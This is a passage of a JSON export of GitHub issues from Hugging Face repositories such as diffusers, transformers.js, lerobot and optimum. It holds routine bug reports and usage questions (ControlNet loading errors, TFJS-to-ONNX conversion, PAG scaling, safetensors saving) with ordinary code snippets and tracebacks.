to read text files", "body": "Hey all is there any text reader in the repo?\r\nI have text files where each line is a document/data sample.\r\n\r\nAre there any readers which can read these kind of files directly?", "url": "https://github.com/huggingface/datatrove/issues/305", "state": "open", "labels": [], "created_at": "2024-11-21T06:55:21Z", "updated_at": "2025-05-16T10:51:33Z", "user": "srinjoym-cerebras" }, { "repo": "huggingface/diffusers", "number": 9979, "title": "flux img2img controlnet channels error", "body": "### Describe the bug\r\n\r\nWhen I use flux's img2img controlnet for inference, a channel error occurs.\r\n\r\n### Reproduction\r\n```python\r\nimport numpy as np\r\nimport torch\r\nimport cv2\r\nfrom PIL import Image\r\nfrom diffusers.utils import load_image\r\nfrom diffusers import FluxControlNetImg2ImgPipeline, FluxControlNetPipeline\r\nfrom diffusers import FluxControlNetModel\r\nfrom controlnet_aux import HEDdetector\r\n\r\nbase_model = \"black-forest-labs/FLUX.1-dev\"\r\ncontrolnet_model = \"Xlabs-AI/flux-controlnet-hed-diffusers\"\r\ncontrolnet = FluxControlNetModel.from_pretrained(\r\n controlnet_model,\r\n 
torch_dtype=torch.bfloat16,\r\n use_safetensors=True,\r\n)\r\npipe = FluxControlNetImg2ImgPipeline.from_pretrained(\r\n base_model, controlnet=controlnet, torch_dtype=torch.bfloat16\r\n)\r\npipe.load_lora_weights(\"./toonystarkKoreanWebtoonFlux_fluxLoraAlpha.safetensors\")\r\n\r\npipe.enable_sequential_cpu_offload()\r\n\r\nhed = HEDdetector.from_pretrained(\"lllyasviel/Annotators\")\r\n\r\nimage_source = load_image(\"./03.jpeg\")\r\ncontrol_image = hed(image_source)\r\ncontrol_image = control_image.resize(image_source.size)\r\nif control_image.mode != 'RGB':\r\n control_image = control_image.convert('RGB')\r\ncontrol_image.save(f\"./hed_03.png\")\r\n\r\nprompt = \"bird, cool, futuristic\"\r\nimage = pipe(\r\n prompt,\r\n image=image_source,\r\n control_image=control_image,\r\n control_guidance_start=0.2,\r\n control_guidance_end=0.8,\r\n controlnet_conditioning_scale=0.5,\r\n num_inference_steps=50,\r\n guidance_scale=6,\r\n).images[0]\r\nimage.save(\"flux.png\")\r\n```\r\n### Logs\r\n\r\n```shell\r\n---------------------------------------------------------------------------\r\nRuntimeError Traceback (most recent call last)\r\nCell In[13], line 2\r\n 1 prompt = \"bird, cool, futuristic\"\r\n----> 2 image = pipe(\r\n 3 prompt,\r\n 4 image=image_source,\r\n 5 control_image=control_image,\r\n 6 control_guidance_start=0.2,\r\n 7 control_guidance_end=0.8,\r\n 8 controlnet_conditioning_scale=0.5,\r\n 9 num_inference_steps=50,\r\n 10 guidance_scale=6,\r\n 11 ).images[0]\r\n 12 image.save(\"flux.png\")\r\n\r\nFile /opt/conda/lib/python3.11/site-packages/torch/utils/_contextlib.py:115, in context_decorator..decorate_context(*args, **kwargs)\r\n 112 @functools.wraps(func)\r\n 113 def decorate_context(*args, **kwargs):\r\n 114 with ctx_factory():\r\n--> 115 return func(*args, **kwargs)\r\n\r\nFile /opt/conda/lib/python3.11/site-packages/diffusers/pipelines/flux/pipeline_flux_controlnet_image_to_image.py:924, in FluxControlNetImg2ImgPipeline.__call__(self, prompt, prompt_2, image, control_image, height, width, strength, num_inference_steps, timesteps, guidance_scale, control_guidance_start, control_guidance_end, control_mode, controlnet_conditioning_scale, num_images_per_prompt, generator, latents, prompt_embeds, pooled_prompt_embeds, output_type, return_dict, joint_attention_kwargs, callback_on_step_end, callback_on_step_end_tensor_inputs, max_sequence_length)\r\n 921 controlnet_cond_scale = controlnet_cond_scale[0]\r\n 922 cond_scale = controlnet_cond_scale * controlnet_keep[i]\r\n--> 924 controlnet_block_samples, controlnet_single_block_samples = self.controlnet(\r\n 925 hidden_states=latents,\r\n 926 controlnet_cond=control_image,\r\n 927 controlnet_mode=control_mode,\r\n 928 conditioning_scale=cond_scale,\r\n 929 timestep=timestep / 1000,\r\n 930 guidance=guidance,\r\n 931 pooled_projections=pooled_prompt_embeds,\r\n 932 encoder_hidden_states=prompt_embeds,\r\n 933 txt_ids=text_ids,\r\n 934 img_ids=latent_image_ids,\r\n 935 joint_attention_kwargs=self.joint_attention_kwargs,\r\n 936 return_dict=False,\r\n 937 )\r\n 939 guidance = (\r\n 940 torch.tensor([guidance_scale], device=device) if self.transformer.config.guidance_embeds else None\r\n 941 )\r\n 942 guidance = guidance.expand(latents.shape[0]) if guidance is not None else None\r\n\r\nFile /opt/conda/lib/python3.11/site-packages/torch/nn/modules/module.py:1511, in Module._wrapped_call_impl(self, *args, **kwargs)\r\n 1509 return self._compiled_call_impl(*args, **kwargs) # type: ignore[misc]\r\n 1510 else:\r\n-> 1511 return 
self._call_impl(*args, **kwargs)\r\n\r\nFile /opt/conda/lib/python3.11/site-packages/torch/nn/modules/module.py:1520, in Module._call_impl(self, *args, **kwargs)\r\n 1515 # If we don't have any hooks, we want to skip the rest of the logic in\r\n 1516 # this function, and just call forward.\r\n 1517 if not (self._backward_hooks or self._backward_pre_hooks or self._forward_hooks or self._forward_pre_hooks\r\n 1518 or _global_backward_pre_hooks or _global_backward_hooks\r\n 1519 or _global_forward_hooks or _global_forward_pre_hooks):\r\n-> 1520 return forward_call(*args, **kwargs)\r\n 1522 try:\r\n 1523 result = None\r\n\r\nFile /opt/conda/lib/python3.11/site-packages/accelerate/hooks.py:170, in add_hook_to_module.<locals>.new_forward(", "url": "https://github.com/huggingface/diffusers/issues/9979", "state": "closed", "labels": [ "bug", "good first issue", "help wanted", "contributions-welcome" ], "created_at": "2024-11-21T03:39:12Z", "updated_at": "2025-04-23T20:43:51Z", "comments": 10, "user": "wen020" }, { "repo": "huggingface/diffusers", "number": 9976, "title": "ControlNet broken from_single_file", "body": "### Describe the bug\r\n\r\nthe controlnet loader from_single_file was originally added via #4084,\r\nand the method `ControlNet.from_single_file()` works for non-converted controlnets.\r\n\r\nbut for controlnets in safetensors format that contain an already-converted state_dict, it errors out.\r\n\r\nit's not reasonable to expect the user to know the internal dict structure of the controlnet safetensors file \r\nbefore they can use it.\r\n\r\neven worse, some of the newer controlnets are distributed as single-file-only and are already in diffusers format, \r\nwhich makes them impossible to load in diffusers.\r\nfor example: \r\n\r\nthis issue was already mentioned several times, each time closed as \"works as designed\", \r\nwhen in reality it's just a failure that should be addressed as an issue. 
\r\nsee #8474 #9208 #8614 as examples of previous issues\r\n\r\n### Reproduction\r\n\r\nscenario-1: works with a non-converted controlnet\r\n```python\r\nimport torch\r\nfrom diffusers import ControlNetModel\r\nfrom huggingface_hub import hf_hub_download\r\nlocal_path = hf_hub_download(repo_id='Aptronym/SDNext', filename='ControlNet11/controlnet11Models_canny.safetensors')\r\ncn = ControlNetModel.from_single_file(local_path, torch_dtype=torch.float16)\r\nprint(cn.__class__)\r\n```\r\n\r\nscenario-2: fails for the majority of controlnets available on huggingface\r\n```python\r\nimport torch\r\nfrom diffusers import ControlNetModel\r\nfrom huggingface_hub import hf_hub_download\r\nlocal_path = hf_hub_download(repo_id='lllyasviel/sd_control_collection', filename='diffusers_xl_canny_small.safetensors')\r\ncn = ControlNetModel.from_single_file(local_path, torch_dtype=torch.float16)\r\nprint(cn.__class__)\r\n```\r\nthe initial failure is nonsense\r\n> OSError: stable-diffusion-v1-5/stable-diffusion-v1-5 does not appear to have a file named config.json.\r\n\r\nwhat's making this worse is that SD15 and SDXL share the same `ControlNet` class, which causes some\r\nconfusion about which base repo to look up the config from.\r\ne.g., here we're loading an SDXL controlnet and the error refers to the SD15 repo.\r\n\r\nanyhow, trying to force the correct config:\r\n```py\r\ncn = ControlNetModel.from_single_file(local_path, torch_dtype=torch.float16, config='diffusers/controlnet-canny-sdxl-1.0-small')\r\n```\r\n\r\nresults in an even worse nonsense failure during loading of the state_dict:\r\n> TypeError: is_floating_point(): argument 'input' (position 1) must be Tensor, not NoneType\r\n\r\n### System Info\r\n\r\ndiffusers=0.32.0.dev0\r\npython==3.12.3\r\ntorch==2.5.1+cu124\r\n\r\n### Who can help?\r\n\r\n@yiyixuxu @sayakpaul @DN6 @asomoza", "url": "https://github.com/huggingface/diffusers/issues/9976", "state": "closed", "labels": [ "bug" ], "created_at": "2024-11-20T13:46:14Z", "updated_at": "2024-11-22T12:22:53Z", "comments": 7, "user": "vladmandic" }, { "repo": "huggingface/lerobot", "number": 515, "title": "ACT is working, but not Diffusion", "body": "Hello Team,\r\n\r\nYour work is so good. I am currently working on creating some nice policies with the LeRobot repo, architecture and software. I tried ACT on my robot; it is working fine and able to execute the tasks it learnt during evaluation. \r\nI tried training the Diffusion policy multiple times with different params, and also with the default params you provide in the repo. I tried PushT in Colab and it's working, but not on the robot. Can you please explain why it's not working, or should I change other things??\r\nI forgot to mention, I used 3 cameras for data collection and training for Diffusion.\r\nThank you\r\n\r\n\r\nEDIT (aliberts): format", "url": "https://github.com/huggingface/lerobot/issues/515", "state": "closed", "labels": [ "question", "policies", "stale" ], "created_at": "2024-11-19T18:58:28Z", "updated_at": "2025-11-30T02:37:09Z", "user": "Kacchan16" }, { "repo": "huggingface/transformers.js", "number": 1042, "title": "how can i pass embeddings or context to a text2text-generation model", "body": "### Question\n\nI downloaded the model locally. I found that there doesn't seem to be an API that allows me to pass embeddings. 
How can I make this model understand the context?\r\n\r\nThen I tried to pass the context content to this model, but the model didn't seem to accept it and output the following words.\r\n\r\nThe code is as follows:\r\n```js\r\nconst model = await pipeline(\"text2text-generation\", \"LaMini-Flan-T5-783M\")\r\nconst result = await model(\"you are a teacher, who are you?\",{})\r\n```\r\n\r\nThis is the model output:\r\n\r\n```json\r\n[\r\n {\r\n \"generated_text\": \"As an AI language model, I am not a teacher.\"\r\n }\r\n]\r\n\r\n```\r\nI don't know whether it's due to the model itself or that I just haven't found the API for passing the context\ud83d\ude15\r\n", "url": "https://github.com/huggingface/transformers.js/issues/1042", "state": "closed", "labels": [ "question" ], "created_at": "2024-11-19T18:32:45Z", "updated_at": "2024-11-20T05:34:45Z", "user": "electroluxcode" }, { "repo": "huggingface/transformers.js", "number": 1041, "title": "Full preload example", "body": "### Question\r\n\r\nHello!\r\n\r\nI'm looking for a full \"preload model\" nodejs example.\r\n\r\nSay I do this:\r\n\r\n```ts\r\nimport { env } from '@huggingface/transformers';\r\nenv.allowRemoteModels = false;\r\nenv.localModelPath = '/path/to/local/models/';\r\n```\r\n\r\nHow do I \"get\" the model to that path? I want to download it when building my docker image.", "url": "https://github.com/huggingface/transformers.js/issues/1041", "state": "closed", "labels": [ "question" ], "created_at": "2024-11-19T12:34:04Z", "updated_at": "2024-11-26T12:44:55Z", "user": "benjick" }, { "repo": "huggingface/transformers.js", "number": 1038, "title": "script.convert tfjs model to onnx support", "body": "### Question\n\nI'm using tfjs-node to create an image-classifier model, \r\nbut I'm stuck on how to convert model.json to a format that can be used by optimum or script.convert to convert it to an ONNX file.\r\n\r\nI'm able to convert to a graph model using \r\n```\r\ntensorflowjs_converter --input_format=tfjs_layers_model \\ --output_format=tfjs_graph_model \\ ./saved-model/layers-model/model.json \\ ./saved-model/graph-model\r\n```\r\n\r\nand then I can convert to an ONNX using \r\n```\r\npython3 -m tf2onnx.convert --tfjs ./saved-model/graph-model/model.json --output ./saved-model/model.onnx\r\n```\r\n\r\nThis works fine when I test in Python, but I'm unable to use it in transformers.js - I probably need to use optimum to convert it?\r\nI tried a number of approaches but was unable to convert to ONNX - I then saw script.convert but am having difficulties.\r\n\r\n- This is an example of the code I'm using to test the model with\r\n```\r\nimport onnxruntime as ort\r\nfrom PIL import Image\r\nimport numpy as np\r\n\r\n# Load the ONNX model\r\nsession = ort.InferenceSession('./saved-model/model.onnx')\r\n\r\n# Get input and output names\r\ninput_name = session.get_inputs()[0].name\r\noutput_name = session.get_outputs()[0].name\r\n\r\n# Load and preprocess the image\r\nimg = Image.open('./training_images/shirt/00e745c9-97d9-429d-8c3f-d3db7a2d2991.jpg').resize((128, 128))\r\nimg_array = np.array(img).astype(np.float32) / 255.0 # Normalize pixel values to [0, 1]\r\nimg_array = np.expand_dims(img_array, axis=0) # Add batch dimension\r\n\r\n# Run inference\r\noutputs = session.run([output_name], {input_name: img_array})\r\nprint(f\"Inference outputs: {outputs}\")\r\n\r\n```\r\n\r\n[Uploading model.onnx.txt\u2026]()\r\n\r\nAny guidance on how to go from a tfjs model.json to an ONNX supported by transformers.js would really help me out.\r\nThanks! 
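For reference, a hedged sketch of my understanding of the local-model layout transformers.js expects (not verified against the transformers.js source; the model id and config fields below are hypothetical placeholders): the library resolves local models as `<env.localModelPath>/<model-id>/` containing a `config.json`, with the ONNX weights under an `onnx/` subfolder, so the tf2onnx output above would need to be arranged accordingly:

```python
import json
import shutil
from pathlib import Path

# Hypothetical model id; would then be referenced from JS as
# pipeline('image-classification', 'my-image-classifier').
model_dir = Path('local-models/my-image-classifier')
(model_dir / 'onnx').mkdir(parents=True, exist_ok=True)

# Place the converted weights where transformers.js conventionally looks.
shutil.copy('./saved-model/model.onnx', model_dir / 'onnx' / 'model.onnx')

# Minimal placeholder config; real fields depend on the model/task (an
# image-classification pipeline would also need a preprocessor_config.json).
(model_dir / 'config.json').write_text(json.dumps({
    'model_type': 'custom',
    'id2label': {'0': 'shirt', '1': 'other'},  # hypothetical labels
}))
```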
\r\n", "url": "https://github.com/huggingface/transformers.js/issues/1038", "state": "open", "labels": [ "question" ], "created_at": "2024-11-18T15:42:46Z", "updated_at": "2024-11-19T10:08:28Z", "user": "JohnRSim" }, { "repo": "huggingface/chat-ui", "number": 1573, "title": "Include chat-ui in an existing React application", "body": "Hello,\r\n\r\nIs it possible to integrate / embed chat-ui in an existing application, like a React component?\r\nFor example, to add a chat module to an existing website with the UI of chat-ui.\r\n\r\nAs is the case with Chainlit : https://docs-prerelease.chainlit.io/customisation/react-frontend", "url": "https://github.com/huggingface/chat-ui/issues/1573", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-11-18T14:11:58Z", "updated_at": "2024-11-18T14:15:17Z", "comments": 0, "user": "martin-prillard" }, { "repo": "huggingface/optimum", "number": 2097, "title": "TFJS support model.json to ONNX conversion", "body": "### Feature request\n\nCurrently using node to create an image-classifier model.json with tfjs \r\n- I don't think Optimum support this format to convert to onnx?\r\n\r\nIt would be nice to just use optimum and point to model.json.\r\n\n\n### Motivation\n\nCurrently I'm creating the model converting it to graph and then converting to onnx like this - \r\n\r\n```\r\ntensorflowjs_converter --input_format=tfjs_layers_model \\ --output_format=tfjs_graph_model \\ ./saved-model/layers-model/model.json \\ ./saved-model/graph-model\r\n```\r\n\r\n```\r\npython3 -m tf2onnx.convert --tfjs ./saved-model/graph-model/model.json --output ./saved-model/model.onnx\r\n```\r\n\r\nI'm not sure how to switch to use optimum - do I need to convert model.json to .h5 and then run? \r\n- if I try this I run into huggingface_hub.errors.HFValidationError: Repo id must be in the form 'repo_name' or 'namespace/repo_name': './path_to_save/model.h5'. Use `repo_type` argument if needed\r\n\r\n\n\n### Your contribution\n\nN/A", "url": "https://github.com/huggingface/optimum/issues/2097", "state": "open", "labels": [ "exporters", "tflite" ], "created_at": "2024-11-18T12:55:05Z", "updated_at": "2024-11-19T10:22:35Z", "comments": 0, "user": "JohnRSim" }, { "repo": "huggingface/optimum-benchmark", "number": 294, "title": "How to Use a Local Model When Calling the Python API", "body": "![image](https://github.com/user-attachments/assets/ca4a11fc-29e5-4537-8e8a-95b309f43afe)\r\n", "url": "https://github.com/huggingface/optimum-benchmark/issues/294", "state": "closed", "labels": [], "created_at": "2024-11-18T06:36:24Z", "updated_at": "2024-12-09T12:23:30Z", "user": "WCSY-YG" }, { "repo": "huggingface/lerobot", "number": 511, "title": "Minimum Requirements - Running Policies in production/ Training Policies", "body": "I was wondering what types of hardware can policies trained using lerobot can run on. Lets say I wanted to run policies in production on say a raspberry pi. Is it possible to run training on beefier hardware and then deploy policies to lower-end hardware to run? Is it better to record with various cameras or just use the same camera? What is the minimum quality?\r\n\r\nYou have tutorials on training and evaluating policies but nothing about deploying to production. Would be interesting to see this. 
\r\n\r\nThank you\r\n\r\n", "url": "https://github.com/huggingface/lerobot/issues/511", "state": "closed", "labels": [ "question" ], "created_at": "2024-11-17T17:34:50Z", "updated_at": "2025-04-07T16:23:41Z", "user": "rkeshwani" }, { "repo": "huggingface/transformers.js", "number": 1035, "title": "How can I implement partial output in the react demo?", "body": "### Question\n\nHello! I am reading the Transformers.js documentation for \"[Building a react application](https://huggingface.co/docs/transformers.js/tutorials/react)\", but I encountered an issue at [step 4](https://huggingface.co/docs/transformers.js/tutorials/react#step-4-connecting-everything-together). \r\nI don't know how to implement the **partial output** of the translation results, even though the documentation provides the following instructions:\r\n\r\n```javascript\r\n let output = await translator(event.data.text, {\r\n tgt_lang: event.data.tgt_lang,\r\n src_lang: event.data.src_lang,\r\n\r\n // Allows for partial output\r\n callback_function: x => {\r\n self.postMessage({\r\n status: 'update',\r\n output: translator.tokenizer.decode(x[0].output_token_ids, { skip_special_tokens: true })\r\n });\r\n }\r\n });\r\n```\r\n\r\nI have completed all the steps in the tutorial documentation, but I still cannot get the output to work properly. I tried using `console.log` for debugging and found that the `callback_function` is not working, and the main thread is not receiving any messages with the status `update`. I have also not found any information about the `callback_function` in the transformers.js documentation. I apologize for taking up your time, but I sincerely need your help. \ud83d\ude4f", "url": "https://github.com/huggingface/transformers.js/issues/1035", "state": "open", "labels": [ "question" ], "created_at": "2024-11-17T11:29:22Z", "updated_at": "2024-12-02T23:00:13Z", "user": "DikkooXie" }, { "repo": "huggingface/lerobot", "number": 510, "title": "Do we have to compulsorily use Trossen Robotics robots for this repo?", "body": "Or will any robot work fine?\n\n\nAlso, one more question.\n\nDo we have to use a depth camera, or will a simple camera work fine?", "url": "https://github.com/huggingface/lerobot/issues/510", "state": "closed", "labels": [ "question", "robots" ], "created_at": "2024-11-17T11:14:52Z", "updated_at": "2025-04-07T16:27:40Z", "user": "hemangjoshi37a" }, { "repo": "huggingface/diffusers", "number": 9942, "title": "Unable to install pip install diffusers>=0.32.0dev", "body": "### Describe the bug\r\n\r\nI am installing the following version\r\npip install diffusers>=0.32.0dev\r\n\r\nHowever, it does nothing\r\n```\r\n(c:\\aitools\\CogVideo\\cv_venv) C:\\aitools\\CogVideo>pip install diffusers>=0.32.0dev\r\n\r\n(c:\\aitools\\CogVideo\\cv_venv) C:\\aitools\\CogVideo>\r\n```\r\n\r\nI even uninstalled the previous version\r\n\r\n```\r\n(c:\\aitools\\CogVideo\\cv_venv) C:\\aitools\\CogVideo>pip uninstall diffusers\r\nFound existing installation: diffusers 0.31.0\r\nUninstalling diffusers-0.31.0:\r\n Would remove:\r\n c:\\aitools\\cogvideo\\cv_venv\\lib\\site-packages\\diffusers-0.31.0.dist-info\\*\r\n c:\\aitools\\cogvideo\\cv_venv\\lib\\site-packages\\diffusers\\*\r\n c:\\aitools\\cogvideo\\cv_venv\\scripts\\diffusers-cli.exe\r\nProceed (Y/n)? 
y\r\n Successfully uninstalled diffusers-0.31.0\r\n```\r\n\r\n### Reproduction\r\n\r\nCreate a conda environment and install using\r\n\r\n`pip install diffusers>=0.32.0dev`\r\n\r\nSo I understand it is not released here:\r\nhttps://pypi.org/project/diffusers/#history\r\n\r\nHow do I install it on Windows 11?\r\n\r\nI even checked the branch\r\n\r\n![image](https://github.com/user-attachments/assets/219faa7c-951a-4c76-886a-376e69c87cee)\r\n\r\n\r\n### Logs\r\n\r\n_No response_\r\n\r\n### System Info\r\n\r\nPython 3.11.10\r\nWindows 11\r\n\r\n### Who can help?\r\n\r\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9942", "state": "closed", "labels": [ "bug" ], "created_at": "2024-11-17T10:26:19Z", "updated_at": "2024-11-17T12:27:23Z", "comments": 0, "user": "nitinmukesh" }, { "repo": "huggingface/candle", "number": 2622, "title": "How to compute `Atan2` for tensors?", "body": "I am trying to implement DeepPhase in candle but I am struggling to figure out how to calculate the phase angles from two tensors using the `atan2` operation.", "url": "https://github.com/huggingface/candle/issues/2622", "state": "open", "labels": [], "created_at": "2024-11-16T16:45:36Z", "updated_at": "2024-11-17T14:21:50Z", "user": "cryscan" }, { "repo": "huggingface/transformers.js", "number": 1032, "title": "How to identify which models will work with transformers.js?", "body": "### Question\n\nI've tried multiple models from the MTEB dashboard (e.g. `jinaai/jina-embeddings-v3`, `jinaai/jina-embeddings-v2`, `dunzhang/stella_en_400M_v5`), but none of them work.\r\n\r\nIt's not clear which models will work.\r\n\r\n```ts\r\nconst generateGteSmallEmbedding = await pipeline(\r\n 'feature-extraction',\r\n 'dunzhang/stella_en_400M_v5',\r\n);\r\n```", "url": "https://github.com/huggingface/transformers.js/issues/1032", "state": "open", "labels": [ "question" ], "created_at": "2024-11-15T22:13:00Z", "updated_at": "2024-12-22T02:41:43Z", "user": "punkpeye" }, { "repo": "huggingface/datasets", "number": 7291, "title": "Why doesn't return_tensors='pt' work?", "body": "### Describe the bug\n\nI tried to add input_ids to a dataset with map(), and I used return_tensors='pt', but why do I get the result back as a List?\r\n![image](https://github.com/user-attachments/assets/ab046e20-2174-4e91-9cd6-4a296a43e83c)\r\n\n\n### Steps to reproduce the bug\n\n![image](https://github.com/user-attachments/assets/5d504d4c-22c7-4742-99a1-9cab78739b17)\n\n### Expected behavior\n\nSorry for this silly question, I'm a noob at using this tool. But I think it should return a tensor value, as I have requested it?\r\nWhen I tokenize only one sentence using tokenized_input = tokenizer(input, return_tensors='pt'), it does return a tensor. 
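\r\n\r\nFor reference, here is my minimal repro plus the workaround I am guessing at -- I read that map() stores its results via Arrow (so tensors come back as plain lists) and that set_format converts them back on access, but I am not sure this is the intended usage:\r\n\r\n```python\r\nfrom datasets import Dataset\r\nfrom transformers import AutoTokenizer\r\n\r\ntok = AutoTokenizer.from_pretrained(\"bert-base-uncased\")\r\nds = Dataset.from_dict({\"text\": [\"hello world\", \"foo bar\"]})\r\n\r\n# return_tensors='pt' is lost here: map() serializes everything to Arrow, so lists come back\r\nds = ds.map(lambda x: tok(x[\"text\"]), batched=True)\r\n\r\n# converting on access instead does give tensors back\r\nds.set_format(\"torch\", columns=[\"input_ids\", \"attention_mask\"])\r\nprint(type(ds[0][\"input_ids\"]))  # torch.Tensor\r\n```\r\n\r\n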
Why doesn't it work in map()?\n\n### Environment info\n\ntransformers>=4.41.2,<=4.45.0\r\ndatasets>=2.16.0,<=2.21.0\r\naccelerate>=0.30.1,<=0.34.2\r\npeft>=0.11.1,<=0.12.0\r\ntrl>=0.8.6,<=0.9.6\r\ngradio>=4.0.0\r\npandas>=2.0.0\r\nscipy\r\neinops\r\nsentencepiece\r\ntiktoken\r\nprotobuf\r\nuvicorn\r\npydantic\r\nfastapi\r\nsse-starlette\r\nmatplotlib>=3.7.0\r\nfire\r\npackaging\r\npyyaml\r\nnumpy<2.0.0\r\n", "url": "https://github.com/huggingface/datasets/issues/7291", "state": "open", "labels": [], "created_at": "2024-11-15T15:01:23Z", "updated_at": "2024-11-18T13:47:08Z", "comments": 2, "user": "bw-wang19" }, { "repo": "huggingface/speech-to-speech", "number": 141, "title": "I don't want to record in real time, how can I upload an audio clip?", "body": "I start the server on a remote machine. On Win10, after launching python listen_and_play.py locally, nothing gets recorded for a while and then the server side just exits??? \r\nHow should I go about sending a pre-recorded audio clip for it to translate?", "url": "https://github.com/huggingface/speech-to-speech/issues/141", "state": "open", "labels": [], "created_at": "2024-11-15T03:58:26Z", "updated_at": "2024-12-20T04:30:13Z", "user": "dh12306" }, { "repo": "huggingface/diffusers", "number": 9930, "title": "[PAG] - Adaptive Scale bug", "body": "### Describe the bug\r\n\r\nWhat is the purpose of the PAG adaptive scale? I was passing a value in it, for example 5.0, while passing 3.0 as the PAG scale; according to the implemented code we will then have a negative number, the scale will return 0, and PAG will not be applied. I did not find an explanation of this parameter in the documentation. \r\n\r\nI then found this in some ComfyUI documentation: \"_This dampening factor reduces the effect of PAG during the later stages of the denoising process, speeding up the overall sampling. A value of 0.0 means no penalty, while 1.0 completely removes PAG_\"\r\n\r\nThen I realized that I had been passing values above 1.0, yet even a value of 0.2 is enough to stop PAG from being applied. I suspect this could be a problem.\r\n\r\nIf you run the code below, you will see that in the third image, where I pass a scale of 0.2 in adaptive_scale, it practically invalidates PAG in the first generation steps.\r\n\r\nI propose a possible solution:\r\n\r\nAfter this code:\r\nhttps://github.com/huggingface/diffusers/blob/5c94937dc7561767892d711e199f874dc35df041/src/diffusers/pipelines/pag/pag_utils.py#L93\r\n\r\nWe can change it to:\r\n```python\r\nif self.do_pag_adaptive_scaling: \r\n signal_scale = self.pag_scale\r\n if t / self.num_timesteps > self.pag_adaptive_scale:\r\n signal_scale = 0\r\n return signal_scale\r\nelse:\r\n return self.pag_scale\r\n```\r\nAnd inside every PAG pipeline, we need to change the \"t\" variable to the \"i\" variable, passed as a parameter to this function, so that it receives the current step number.\r\n\r\nhttps://github.com/huggingface/diffusers/blob/5c94937dc7561767892d711e199f874dc35df041/src/diffusers/pipelines/pag/pipeline_pag_sd_xl.py#L1253\r\n\r\nWith this, the logic will no longer be that the higher the adaptive scale value, the faster PAG is disabled, but quite the opposite: the scale will tell you exactly at what point in the process PAG will be disabled. 
If the scale exceeds 0.5 in a 30-step generation, the PAG will be disabled from step 15 onwards. The scale applied will be the same until the moment of the cut and will not be a variable scale.\r\nI don't know if this was the original purpose of this parameter, but it works well for me.\r\n\r\n\r\n\r\n\r\n### Reproduction\r\n\r\n```python\r\nfrom diffusers import AutoPipelineForText2Image\r\nimport torch\r\n\r\ndevice = \"cuda\"\r\n\r\npipeline_sdxl = AutoPipelineForText2Image.from_pretrained(\r\n \"stabilityai/stable-diffusion-xl-base-1.0\",\r\n enable_pag=True,\r\n pag_applied_layers=[\"mid\"],\r\n torch_dtype=torch.float16\r\n).to(device)\r\n\r\npipeline = AutoPipelineForText2Image.from_pipe(pipeline_sdxl, enable_pag=True).to(device)\r\npipeline.enable_vae_tiling() \r\npipeline.enable_model_cpu_offload()\r\n\r\nprompt = \"an insect robot preparing a delicious meal, anime style\"\r\n\r\nfor i, pag_scale in enumerate([0.0, 3.0, 3.0]):\r\n generator = torch.Generator(device=\"cpu\").manual_seed(0)\r\n images = pipeline(\r\n prompt=prompt,\r\n num_inference_steps=25,\r\n guidance_scale=7.0,\r\n generator=generator,\r\n pag_scale=pag_scale,\r\n pag_adaptive_scale=0.0 if i < 2 else 0.2\r\n ).images[0]\r\n images.save(f\"./data/result_pag_{i+1}.png\")\r\n\r\n```\r\n\r\n### Logs\r\n\r\n```shell\r\nN/A\r\n```\r\n\r\n\r\n### System Info\r\n\r\n- \ud83e\udd17 Diffusers version: 0.32.0.dev0\r\n- Platform: Linux-5.15.153.1-microsoft-standard-WSL2-x86_64-with-glibc2.35\r\n- Running on Google Colab?: No\r\n- Python version: 3.10.11\r\n- PyTorch version (GPU?): 2.4.0+cu121 (True)\r\n- Flax version (CPU?/GPU?/TPU?): 0.10.1 (cpu)\r\n- Jax version: 0.4.35\r\n- JaxLib version: 0.4.35\r\n- Huggingface_hub version: 0.26.2\r\n- Transformers version: 4.46.2\r\n- Accelerate version: 1.1.1\r\n- PEFT version: 0.13.2\r\n- Bitsandbytes version: not installed\r\n- Safetensors version: 0.4.5\r\n- xFormers version: 0.0.27.post2\r\n- Accelerator: NVIDIA GeForce RTX 3060 Ti, 8192 MiB\r\n- Using GPU in script?: \r\n- Using distributed or parallel set-up in script?: \r\n\r\n### Who can help?\r\n\r\n@yiyixuxu , @asomoza ", "url": "https://github.com/huggingface/diffusers/issues/9930", "state": "open", "labels": [ "bug", "stale" ], "created_at": "2024-11-15T02:00:19Z", "updated_at": "2024-12-15T15:03:05Z", "comments": 1, "user": "elismasilva" }, { "repo": "huggingface/safetensors", "number": 541, "title": "[Question] Safetensors seem to block the main thread -- but torch.save does not?", "body": "I have the following code in my training loop:\r\n```\r\n if rank == 0:\r\n t = Thread(\r\n target=save_file,\r\n args=(model_sd, f\"{cfg.model_dir}/model_{step + 1}.safetensors\"),\r\n daemon=True\r\n )\r\n t.start()\r\n```\r\nWhich saves the checkpoint to disk using safetensors. However, I notice that this blocks the training loop, even though the thread should be running in the background.\r\n\r\nWhen I switch the code to use `torch.save`, there's no issue. 
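\r\n\r\nMy working theory is that `save_file` holds the GIL for the whole serialization, so the \"background\" thread still stalls the loop. Here is the workaround I am testing -- a sketch that copies the state dict to CPU and saves from a separate process instead of a thread:\r\n\r\n```python\r\nfrom multiprocessing import Process\r\n\r\nfrom safetensors.torch import save_file\r\n\r\ndef _save(state_dict, path):\r\n    save_file(state_dict, path)\r\n\r\nif rank == 0:\r\n    # copy off-GPU first so the child process receives plain CPU tensors\r\n    cpu_sd = {k: v.detach().cpu() for k, v in model_sd.items()}\r\n    p = Process(target=_save, args=(cpu_sd, f\"{cfg.model_dir}/model_{step + 1}.safetensors\"), daemon=True)\r\n    p.start()\r\n```\r\n\r\n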
What should I do?", "url": "https://github.com/huggingface/safetensors/issues/541", "state": "open", "labels": [], "created_at": "2024-11-15T00:37:55Z", "updated_at": "2025-02-26T09:51:23Z", "comments": 4, "user": "vedantroy" }, { "repo": "huggingface/peft", "number": 2216, "title": "How to specify the coefficients of loading lora during inference?", "body": "", "url": "https://github.com/huggingface/peft/issues/2216", "state": "closed", "labels": [], "created_at": "2024-11-14T11:47:00Z", "updated_at": "2024-11-18T11:30:03Z", "user": "laolongboy" }, { "repo": "huggingface/chat-ui", "number": 1565, "title": "Is there any place that uses this environment variable?", "body": "https://github.com/huggingface/chat-ui/blob/ab349d0634ec4cf68a781fd7afc5e7fdd6bb362f/.env#L59-L65\r\n\r\nIt seems like it can be deleted.", "url": "https://github.com/huggingface/chat-ui/issues/1565", "state": "closed", "labels": [], "created_at": "2024-11-14T11:12:49Z", "updated_at": "2024-11-14T11:17:04Z", "comments": 2, "user": "calycekr" }, { "repo": "huggingface/diffusers", "number": 9927, 